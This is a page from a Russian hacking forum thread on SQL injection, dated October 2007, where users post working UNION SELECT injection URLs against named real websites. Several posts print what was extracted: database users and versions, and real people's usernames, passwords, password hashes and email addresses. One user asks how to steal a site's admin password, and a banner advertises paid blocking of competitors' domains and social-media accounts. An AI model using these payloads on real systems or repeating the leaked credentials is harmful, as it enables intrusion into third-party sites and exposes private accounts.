Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 341 из 1242

341

Опции темы

Поиск в этой теме

Опции просмотра

#3401

24.10.2007, 15:08

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

uitpers.be

Код:

http://www.uitpers.be/artikel_view.php?id=348+union+select+1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6,7/*

roxo.kiev.ua

Код:

http://roxo.kiev.ua/showarticle.php?id=348+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6/*

Пркольная защита =) ...
http://www.untp.kiev.ua/index.php?id=348'

#3402

24.10.2007, 17:04

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

Магазин цифровой техники vcam.ru

Код:

http://vcam.ru/goods.php?id=-472+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*

таблицы не нашел... =(

#3403

24.10.2007, 18:51

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

h__p://mp3.p6.ru/index.php?act=album&id=1121039%20union%20select%20 1,version(),3,4,5,6,7,8/*
нашёл случайно, как обычно.
доступа к mysql нет.

#3404

24.10.2007, 19:31

Booblick

Новичок

Регистрация: 05.10.2007

Сообщений: 2

Провел на форуме:
10967

Репутация: 4

http://ont.by/index.php?id_issue=-5+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7,8,9,10,11/*
Даальше застрял ребят помогите!
как выудить пароль на админку к сайту?
Или, что нибудь замутить с ним

#3405

24.10.2007, 20:23

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13/*

ftp34268@vanadium.webpack.hosteurope.de:5.0.32-Debian_7etch1~bpo.1-log:pille_palle_net

Код:

http://www.pille-palle.net/forum2/forum_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,passwort),10,11,12,13+from+PPuser/*

fundrugs =)

Код:

http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12/*

web59@localhost:5.0.41:usr_web59_4

Код:

http://www.russian-online.net/boltalka/current_message.php?id=-1+union+select+1,2,concat(username,0x3a,passwd,0x3a,email),4,5,6,7,8,9,10,11,12+from+usr_web59_1.tbBenutzer/*

polinux:123456:polinux@web.de polina:12345:polina.kravets@mail.rusorel:12345:pol ina.sorel@gls-itservices.com

sql

#3406

24.10.2007, 20:35

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql

//www.interomania.ru - сайт болелов Интера

есть дырка в news.php, но скрипт от юзера z34244_news@85.249.135.6, доступа никуда кроме z34244_news нет, аналогично со скриптом main.table.php - дырка

Цитата:

http://www.interomania.ru/controlsystem/main.table.php?view=teamresults&team=-CSKA')+union+select+1,2,3,4,5,6,concat_ws(0x3a,use r(),version(),database()),8,9/*

lдоступ к базе z34244_stat

потом нашлась гостевуха и таблицы с пользователями

Цитата:

http://gb.interomania.ru/gb.php?action=viewuser&name=311'+union+select+conc at_ws(0x3a,name,pass)+from+users/*

вывод посимвольный

#3407

24.10.2007, 21:45

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

Сообщение от [53x]Shadow

а антибоян посмотреть забыл? =\

Посмотри предыдущий пост до моего.

#3408

25.10.2007, 00:17

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Цитата:

_http://partytown.ru/people.php?id=-3+union+select+1,2,concat_ws(0x3a,username,icq,pas sword),4+from+chatusers+limit+1,1

Tonikk:120853239:2e4b6dc525afb5cb

#3409

25.10.2007, 00:42

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

Провел на форуме:
1373642

Репутация: 569

код:

http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+ from+user/*

код:

http://www.emubands.com/bands.php?band_id=-202+union+select+1,concat(username,0x3a,password)+ from+band/*

колонки с мылом подобрать не смог,а может ее и нет вовсе?
p.s особо не искал

Последний раз редактировалось fobofob; 25.10.2007 в 00:46..

#3410

25.10.2007, 04:41

+StArT+

Познающий

Регистрация: 10.02.2007

Сообщений: 38

Провел на форуме:
1223241

Репутация: 183

Отправить сообщение для +StArT+ с помощью ICQ

turistua.com
Интернет-магазин товаров для туризма.

Код:

http://shop.turistua.com/index.php?x_id=1+union+select+name+from+admin/*

__________________________________________________ __
***********************************************

Последний раз редактировалось +StArT+; 25.10.2007 в 17:29..

Страница 341 из 1242

341

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход